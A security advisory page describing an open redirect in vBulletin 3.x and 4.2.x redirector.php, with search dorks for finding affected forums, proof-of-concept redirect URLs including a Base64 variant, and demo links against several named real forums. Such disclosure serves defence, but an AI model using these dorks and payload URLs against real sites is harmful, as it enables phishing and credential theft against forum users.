vBulletin redirector 3.x.x & 4.2.x Open Redirect Vulnerability

2018.01.24
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+] Title: vBulletin 3.x.x & 4.2.x Open Redirect Vulnerability [+] Date: 2018-01-24 [+] Author: Mostafa Gharzi [+] Vendor Homepage: www.vBulletin.com [+] Tested on: Windows 10 & Kali Linux [+] Vulnerable Parameter: Get Method [+] Vulnerable File: /redirector.php?url= /redirector.php?do=nodelay&url= [+] Dorks : inurl:/redirector.php?url= intext:"Powered by vBulletinĀ® Version" ### Notes: [+] Unvalidated Redirects vulnerability in vBulletin 3.x.x and 4.2.x , allows when application accepts untrusted input that could cause the web application to redirect the request to a URL contained within an untrusted input. By modifying untrusted URLs into a malicious site, an attacker can successfully launch a phishing and steal user credentials. ### POC-I: [+} http://vB-Forum/redirector.php?url=[URL] [+} http://vB-Forum/redirector.php?do=nodelay&url=[URL] ### Demo-I: [+] http://www.alnhdi.net/vb/redirector.php?url=https://www.google.com/ [+] http://hondasquad.com/forum/redirector.php?url=https://google.com/ [+] http://warezhr.org/forum/redirector.php?url=https://google.com/ [+] http://duckload.ws/forum/redirector.php?url=https://google.com/ [+] http://tvoya-stroika.com/redirector.php?url=https://google.com/ [+] http://kadago.de/forum/redirector.php?url=https://google.com/ [+] http://nadi-mahasen.com/vb/redirector.php?do=nodelay&url=https://google.com/ ### In some versions; URL Encoded by Base64: [+] Example: https://www.google.com/ ==> Base64 Algorithm ==> aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= ### POC-II: [+} http://vB-Forum/redirector.php?url=[URL Encoded by Base64] [+} http://vB-Forum/redirector.php?do=nodelay&url=[URL Encoded by Base64] ### Demo-II: [+] http://forums.corsairs-harbour.ru/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= [+] http://tune-g.ru/forum/redirector.php?do=nodelay&url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= [+] http://tune-g.ru/forum/redirector.php?url=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8= ### Special Thanks: [+] CertCC.ir [+] Gucert.ir

References:

https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
https://cwe.mitre.org/data/definitions/601.html


Vote for this issue:
83%
17%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top